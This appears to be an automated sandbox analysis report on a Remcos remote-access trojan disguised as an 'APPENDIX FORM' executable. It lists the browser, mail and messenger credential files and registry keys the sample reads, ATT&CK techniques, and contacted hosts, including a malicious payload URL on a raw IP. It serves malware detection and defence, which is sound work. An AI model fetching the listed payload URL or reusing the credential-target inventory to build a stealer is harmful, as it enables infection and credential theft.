            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\rjnmrfinqcmgocyodymjbnnrmv"Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\bdsfsxbheketyimsnjzkeaiancxhuh"Jump to behavior
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.2163539656.00000000028E2000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601858735.00000000028E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.2163539656.00000000028E2000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601858735.00000000028E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager_
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.2163539656.00000000028E2000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E2933 cpuid 4_2_333E2933
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_333E2264
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,9_2_004082CD
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_00405D02 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D02
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Tries to steal Mail credentials (via file registry)
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: ESMTPPassword9_2_004033F0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword9_2_00402DB3
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword9_2_00402DB3
            Yara detected WebBrowserPassView password recovery tool
            Source: Yara matchFile source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 3616, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Detected Remcos RAT
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-CDCZ2KJump to behavior
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            Access Token Manipulation            		2
            Obfuscated Files or Information            		2
            Credentials in Registry            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		2
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
            Process Injection            		1
            Software Packing            		1
            Credentials In Files            		2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS228
            System Information Discovery            		Distributed Component Object Model2
            Clipboard Data            		1
            Remote Access Software            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Masquerading            		LSA Secrets231
            Security Software Discovery            		SSHKeylogging2
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Virtualization/Sandbox Evasion            		VNCGUI Input Capture112
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync4
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            APPENDIX FORM_N#U00b045013-20241120.com.exe53%ReversingLabsWin32.Backdoor.Remcos

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsc44A6.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://45.133.158.36/cvTLIRXJzBJoApmtjAY235.bin0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            		178.237.33.50
            		truefalse
              		high
              s-part-0017.t-0009.t-msedge.net
              		13.107.246.45
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                  		high
                  http://45.133.158.36/cvTLIRXJzBJoApmtjAY235.bintrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gp$APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Pbhv2DCB.tmp.8.drfalse
                      		high
                      https://www.office.com/bhv2DCB.tmp.8.drfalse
                        		high
                        https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9bhv2DCB.tmp.8.drfalse
                          		high
                          http://www.imvu.comrAPPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333B0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            		high
                            http://geoplugin.net/json.gp0GAPPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://geoplugin.net/json.gpMGAPPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://aefd.nelreports.net/api/report?cat=bingthbhv2DCB.tmp.8.drfalse
                                  		high
                                  http://geoplugin.net/json.gp-APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.imvu.comAPPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969235766.000000000086D000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969187492.000000000086D000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://aefd.nelreports.net/api/report?cat=wsbbhv2DCB.tmp.8.drfalse
                                        		high
                                        http://www.imvu.comppDataAPPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969235766.000000000086D000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969187492.000000000086D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.nirsoft.netAPPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985266200.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                            		high
                                            https://aefd.nelreports.net/api/report?cat=bingaotakbhv2DCB.tmp.8.drfalse
                                              		high
                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv2DCB.tmp.8.drfalse
                                                		high
                                                https://deff.nelreports.net/api/report?cat=msnbhv2DCB.tmp.8.drfalse
                                                  		high
                                                  http://nsis.sf.net/NSIS_ErrorErrorAPPENDIX FORM_N#U00b045013-20241120.com.exefalse
                                                    		high
                                                    https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05bhv2DCB.tmp.8.drfalse
                                                      		high
                                                      https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58bhv2DCB.tmp.8.drfalse
                                                        		high
                                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comAPPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333B0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://geoplugin.net/json.gpTGuAPPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.comAPPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://geoplugin.net/json.gpAAPPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://nsis.sf.net/NSIS_ErrorAPPENDIX FORM_N#U00b045013-20241120.com.exefalse
                                                                  		high
                                                                  https://aefd.nelreports.net/api/report?cat=bingaotbhv2DCB.tmp.8.drfalse
                                                                    		high
                                                                    https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8ebbhv2DCB.tmp.8.drfalse
                                                                      		high
                                                                      https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv2DCB.tmp.8.drfalse
                                                                        		high
                                                                        http://geoplugin.net/json.gpNAPPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://aefd.nelreports.net/api/report?cat=bingrmsbhv2DCB.tmp.8.drfalse
                                                                            		high
                                                                            https://www.google.com/accounts/serviceloginAPPENDIX FORM_N#U00b045013-20241120.com.exefalse
                                                                              		high
                                                                              https://login.yahoo.com/config/loginAPPENDIX FORM_N#U00b045013-20241120.com.exefalse
                                                                                		high
                                                                                http://www.nirsoft.net/APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://geoplugin.net/json.gp_APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv2DCB.tmp.8.drfalse
                                                                                      		high
                                                                                      http://www.ebuddy.comAPPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        178.237.33.50
                                                                                        		geoplugin.netNetherlands
                                                                                        		8455ATOM86-ASATOM86NLfalse
                                                                                        45.133.158.36
                                                                                        		unknownGermany
                                                                                        		40676AS40676UStrue

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1560110
                                                                                        Start date and time:2024-11-21 12:18:11 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 52s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:12
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:APPENDIX FORM_N45013-20241120.com.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 97%
                                                                                        • Number of executed functions: 183
                                                                                        • Number of non-executed functions: 311
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: APPENDIX FORM_N#U00b045013-20241120.com.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        06:20:52API Interceptor92066x Sleep call for process: APPENDIX FORM_N#U00b045013-20241120.com.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        178.237.33.50wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        s-part-0017.t-0009.t-msedge.netPayslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                        • 13.107.246.45
                                                                                        phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        CB1.exeGet hashmaliciousBlackMoonBrowse
                                                                                        • 13.107.246.45
                                                                                        +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                        • 13.107.246.45
                                                                                        geoplugin.netwE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                        • 178.237.33.50
                                                                                        ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                        • 178.237.33.50
                                                                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                        • 178.237.33.50
                                                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        AS40676UShttps://ambir.com/ambir-card-scanners/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                        • 45.61.136.196
                                                                                        https://ambir.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                        • 45.61.136.196
                                                                                        https://ambir.com/ambir-card-scanners/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                        • 45.61.136.196
                                                                                        KRcLFIz5PCQunB7.exeGet hashmaliciousQuasarBrowse
                                                                                        • 103.126.138.87
                                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 76.74.72.61
                                                                                        08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                                                                        • 107.160.131.254
                                                                                        PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                                                                        • 107.160.131.252
                                                                                        jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                                                                        • 107.160.131.254
                                                                                        81mieek02V.dllGet hashmaliciousUnknownBrowse
                                                                                        • 107.160.131.254
                                                                                        Vb1S2HJcnN.dllGet hashmaliciousUnknownBrowse
                                                                                        • 107.160.131.254
                                                                                        ATOM86-ASATOM86NLwE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                        • 178.237.33.50
                                                                                        ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                        • 178.237.33.50
                                                                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                        • 178.237.33.50
                                                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\user\AppData\Local\Temp\nsc44A6.tmp\System.dllOFFER KH-20241024.exeGet hashmaliciousGuLoaderBrowse
                                                                                          OFFER KH-20241024.exeGet hashmaliciousGuLoaderBrowse
                                                                                            Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              WnsTnPaieH.exeGet hashmaliciousGuLoaderBrowse
                                                                                                WnsTnPaieH.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  LisectAVT_2403002B_95.exeGet hashmaliciousUnknownBrowse
                                                                                                    RFQ-PRECISE PO #2798106_PDF.exeGet hashmaliciousGuLoaderBrowse
